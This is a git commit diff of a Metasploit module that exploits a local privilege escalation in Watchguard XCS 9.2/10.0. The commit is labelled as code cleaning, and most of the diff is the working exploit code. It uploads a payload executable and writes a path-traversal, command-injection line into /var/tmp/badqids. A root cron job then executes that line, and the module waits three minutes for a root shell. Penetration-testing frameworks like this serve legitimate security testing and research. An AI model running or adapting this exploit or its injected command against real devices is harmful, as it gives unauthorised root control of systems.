Do watchguard_local_privesc code cleaning
parent
c79671821d
commit
6b46316a56
|
@ -7,7 +7,10 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
# It needs 3 minutes wait time
|
||||
# WfsDelay set to 180, so it should be a Manual exploit,
|
||||
# to avoid it being included in automations
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Post::File
|
||||
|
@ -32,63 +35,68 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
'Platform' => 'bsd',
|
||||
'Arch' => ARCH_X86_64,
|
||||
'SessionTypes' => ['shell'],
|
||||
'Privileged' => false,
|
||||
'Privileged' => true,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Watchguard XCS 9.2/10.0', { }]
|
||||
],
|
||||
'DefaultOptions' => { 'WfsDelay' => 180 },
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jun 29 2015'
|
||||
))
|
||||
end
|
||||
|
||||
def setup
|
||||
@pl = generate_payload_exe
|
||||
if @pl.nil?
|
||||
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
def check
|
||||
#Basic check to see if the device is a Watchguard XCS
|
||||
res = cmd_exec('uname -a')
|
||||
return Exploit::CheckCode::Appears if res =~ /support-xcs@watchguard.com/
|
||||
return Exploit::CheckCode::Detected if res && res.include?('support-xcs@watchguard.com')
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def upload_payload
|
||||
#Generates and uploads the payload to the device
|
||||
fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
|
||||
@pl = generate_payload_exe
|
||||
|
||||
write_file(fname, @pl)
|
||||
return nil if not file_exist?(fname)
|
||||
return nil unless file_exist?(fname)
|
||||
cmd_exec("chmod +x #{fname}")
|
||||
return fname
|
||||
|
||||
fname
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Rooting can take up to 3 minutes.")
|
||||
print_warning('Rooting can take up to 3 minutes.')
|
||||
|
||||
#Generate and upload the payload
|
||||
filename = upload_payload
|
||||
fail_with(Failure::NotFound, "Payload failed to upload") if filename.nil?
|
||||
fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil?
|
||||
print_status("Payload #{filename} uploaded.")
|
||||
|
||||
#Sets up empty dummy file needed for privesc
|
||||
dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
|
||||
cmd_exec("touch #{dummy_filename}")
|
||||
vprint_status("Added dummy file")
|
||||
vprint_status('Added dummy file')
|
||||
|
||||
#Put the shell injection line into badqids
|
||||
#setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
|
||||
badqids = write_file("/var/tmp/badqids","../../../../../..#{dummy_filename};#{filename}")
|
||||
fail_with(Failure::NotFound, "Failed to create badqids file to exploit crontab") if badqids.nil?
|
||||
print_status("Badqids created, waiting for vulnerable script to be called by crontab...")
|
||||
badqids = write_file('/var/tmp/badqids', "../../../../../..#{dummy_filename};#{filename}")
|
||||
fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') if badqids.nil?
|
||||
print_status('Badqids created, waiting for vulnerable script to be called by crontab...')
|
||||
#cmd_exec(setup_privesc)
|
||||
|
||||
#Cleanup the files we used
|
||||
register_file_for_cleanup("/var/tmp/badqids")
|
||||
register_file_for_cleanup('/var/tmp/badqids')
|
||||
register_file_for_cleanup(dummy_filename)
|
||||
register_file_for_cleanup(filename)
|
||||
|
||||
#Wait for crontab to run vulnerable script
|
||||
select(nil,nil,nil,180) #Wait 3 minutes to ensure cron script is run
|
||||
print_status("Ran out of time, should have root shell by now.")
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue